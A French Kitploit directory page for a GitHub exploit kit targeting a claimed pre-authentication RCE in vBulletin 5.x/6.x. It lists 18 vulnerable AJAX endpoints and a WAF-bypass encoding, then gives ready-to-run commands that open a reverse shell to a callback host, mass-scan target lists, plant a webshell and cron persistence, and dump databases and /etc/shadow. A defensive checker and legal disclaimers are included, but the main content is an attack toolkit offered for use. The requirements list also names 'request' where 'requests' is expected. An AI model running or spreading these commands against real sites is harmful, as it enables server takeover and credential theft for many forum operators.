Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-61511-PoC-Exploit — CVE-2026-61511 – vBulletin RCE pré-authentification (CVSS 9.8). Vuln 5.x/6.x (non corrigé). Multi-exploit via Endpoint Pool, AJAX, contournement WAF PHPFuck. Kit complet : reverse shell, proxy, persistance, webshell, opérations base de données, contrôle du pare-feu, gestion des journaux, scan de masse. 2 versions : multi-exploit et vérification sûre. Python 3.8+ Utilisez de manière éthique, restez légal. 🔒 | Kitploit
Outils/GitHubGitHub/tc4dy/cve-2026-61511-poc-exploit
Cartographie RéseauAnalyse des VulnérabilitésExploitationExploitation d'Applications WebPost-ExploitationContournement de WAFTests d'IntrusionOutil d'Accès à DistanceDéveloppement de Charges Utiles

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Sécurité des Bases de Données
GitHubtc4dy/cve-2026-61511-poc-exploit

CVE-2026-61511-PoC-Exploit

Voir le dépôt
410il y a 1 moisPas encore vérifié

À propos

CVE-2026-61511 – vBulletin RCE pré-authentification (CVSS 9.8). Vuln 5.x/6.x (non corrigé). Multi-exploit via Endpoint Pool, AJAX, contournement WAF PHPFuck. Kit complet : reverse shell, proxy, persistance, webshell, opérations base de données, contrôle du pare-feu, gestion des journaux, scan de masse. 2 versions : multi-exploit et vérification sûre. Python 3.8+ Utilisez de manière éthique, restez légal. 🔒

Partager

CVEPoC

CVE-2026-61511 – Exploit & Vérificateur RCE Pré‑Authentification vBulletin

Python 3.8+ CVSS Author vBulletin

⚠️ UTILISATION ÉTHIQUE UNIQUEMENT – TESTS DE SÉCURITÉ AUTORISÉS
Ce dépôt fournit des outils destinés uniquement aux professionnels de la sécurité autorisés, aux équipes bleues et aux testeurs d'intrusion.
L'accès non autorisé à des systèmes informatiques est illégal en vertu de la CFAA (États-Unis), du Computer Misuse Act (Royaume-Uni), du TCK 243/244 (Turquie) et des lois similaires dans le monde entier.


📖 Présentation de la vulnérabilité

CVE‑2026‑61511 est une faille d'injection PHP eval() dans le moteur de rendu de modèles AJAX de vBulletin.
Versions concernées : 5.0.0 – 5.7.5 et 6.0.0 – 6.2.1.

Comment cela fonctionne

  1. Points d'attaque multiples – le bug existe dans plusieurs gestionnaires AJAX :

    • /ajax/render/pagenav
    • /ajax/api/ad/replaceAdTemplate
    • /ajax/render/widget_php
    • /ajax/render/widget_tabbedcontainer_tab_panel
    • Divers points d'accès /ajax/api/content_* /getIndexableContent
  2. Encodage PHPFuck – la charge utile est transformée en une séquence d'opérateurs et de nombres PHP qui contourne les filtres WAF et permet l'exécution de code PHP arbitraire.

  3. Aucune authentification requise – un attaquant peut envoyer une requête POST forgée à n'importe quel point d'accès vulnérable et exécuter des commandes système avec les privilèges du serveur web.

  4. Impact – compromission totale du serveur, vol de données, portes dérobées, mouvement latéral et persistance. Mettez à niveau la version !

Correctif

  • vBulletin 6.2.2 et le Patch Level 1 pour les versions antérieures corrigent ce problème.
  • Mettez toujours à niveau vers la dernière version.

🧰 Outils

OutilObjectifUtilisateur visé
exploit.pyBoîte à outils complète avec shell inversé, persistance, opérations sur fichiers, dump de base de données, gestion du pare-feu, gestion des journaux, redirection de ports, déploiement de clés SSH, scan réseau et scan de masse (multi‑thread).

📊 Comparaison des fonctionnalités


🎯 Résumé des cas d'utilisation


⚙️ Installation

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-61511-PoC-Exploit
cd CVE-2026-61511-PoC-Exploit
pip install -r requirements.txt

Contenu de requirements.txt :

root@kitploit:~
request
urllib3

Paramètres 🌬️

Scénarios

Pool de points d'accès 🅿️

🛡️ Utilisation responsable

  • Utilisez ces outils uniquement sur des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation écrite explicite de test.
  • L'accès non autorisé est illégal et contraire à l'éthique.
  • Les auteurs ne sont pas responsables de toute utilisation abusive.
  • Respectez toujours les lois et réglementations de votre pays.

Ce logiciel est fourni uniquement à des fins éducatives et pour des tests de sécurité autorisés.

Télécharger l’outil
Équipes rouges / pentesteurs autorisés
safecheck.pyVérificateur non intrusif qui teste la vulnérabilité sans exécuter de charge utile malveillante. Détecte la version, teste tous les points d'accès et génère un rapport détaillé.Équipes bleues / auditeurs de sécurité
Fonctionnalitéexploit.pysafecheck.py
Détection de vulnérabilité✅✅
Détection de version✅✅
Test multi‑points d'accès (18 chemins)✅✅
Exécution de commandes✅❌
Shell inversé✅❌
Téléversement/téléchargement de fichiers✅❌
Mécanismes de persistance✅❌
Déploiement de web shell✅❌
Opérations sur base de données✅❌
Collecte d'informations système✅✅
Gestion du pare-feu✅❌
Gestion des journaux✅❌
Redirection de ports✅❌
Déploiement de clés SSH✅❌
Scan réseau✅❌
Scan de masse (multi‑thread)✅❌
Prise en charge des proxys✅✅
Sortie de rapport JSON✅✅
Menu interactif✅❌
Mode non intrusif (sûr)❌✅
Mode verbeux/Débogage✅✅
Exécution de commandes personnalisées✅❌
Chaînage de commandes multiples✅❌
Lecture de fichiers distants✅❌
Écriture de fichiers distants✅❌
Gestion des utilisateurs système✅❌
Techniques de contournement du pare-feu✅❌
Évitement WAF (PHPFuck)✅✅
ScénarioOutil recommandé
Équipe bleue – vérification si votre installation vBulletin est vulnérablesafecheck.py
Audit de sécurité – évaluation de vulnérabilité non intrusivesafecheck.py
Équipe rouge – test d'intrusion autorisé avec exploitation complèteexploit.py
Bug Bounty – test de divulgation responsablesafecheck.py
Scan de masse – vérification de la vulnérabilité de plusieurs ciblesexploit.py (détection uniquement)
Réponse à incident – vérification si les systèmes sont compromissafecheck.py
ParamètreDescription
-t, --targetURL cible (ex. http://forum.com/vb)
--proxyProxy HTTP (ex. http://127.0.0.1:8080)
--timeoutDélai d'expiration des requêtes en secondes (défaut : 10)
--retryNombre de tentatives par chemin (défaut : 3)
--outputEnregistrer le rapport détaillé dans un fichier JSON
-v, --verboseSortie verbeuse
-q, --quietMode silencieux (sortie minimale)
--lhostRequis pour l'exploit – IP pour le rappel
--lportPort pour le rappel (défaut : 4444)
--threadsThreads pour le scan de masse (défaut : 5)
--exploitEffectuer l'exploitation après détection
--fullAttaque complète (tous les modules)
--shellDémarrer un shell inversé
--webshellInstaller un web shell (/shell.php)
--persistInstaller la persistance (tâche cron)
--dumpDump de la base de données
--dump-credsDump des identifiants (/etc/passwd, /etc/shadow)
--interactiveMenu interactif après vérification réussie
#ScénarioCommande
1Vérification rapide de vulnérabilitépython safecheck.py -t http://target.com/vb
2Scan détaillé avec rapportpython safecheck.py -t http://target.com/vb --output report.json -v
3Shell inversépython exploit.py -t http://target.com/vb --lhost 192.168.1.100 --lport 4444 --shell
4Attaque complète (tous les modules)python exploit.py -t http://target.com/vb --lhost 192.168.1.100 --full
5Scan de masse depuis un fichierpython exploit.py -l targets.txt --lhost 192.168.1.100 --threads 20 --output results.json
6Mode menu interactifpython exploit.py -t http://target.com/vb --lhost 192.168.1.100 --interactive
#Point d'accès
1/ajax/render/pagenav
2/ajax/render/pagenav?template=page
3/ajax/api/ad/replaceAdTemplate
4/ajax/render/widget_php
5/ajax/render/widget_tabbedcontainer_tab_panel
6/ajax/api/content_infraction/getIndexableContent
7/ajax/api/content_video/getIndexableContent
8/ajax/api/content_text/getIndexableContent
9/ajax/api/content_report/getIndexableContent
10/ajax/api/content_redirect/getIndexableContent
11/ajax/api/content_privatemessage/getIndexableContent
12/ajax/api/content_poll/getIndexableContent
13/ajax/api/content_photo/getIndexableContent
14/ajax/api/content_link/getIndexableContent
15/ajax/api/content_gallery/getIndexableContent
16/ajax/api/content_event/getIndexableContent
17/ajax/api/content_channel/getIndexableContent
18/ajax/api/content_attach/getIndexableContent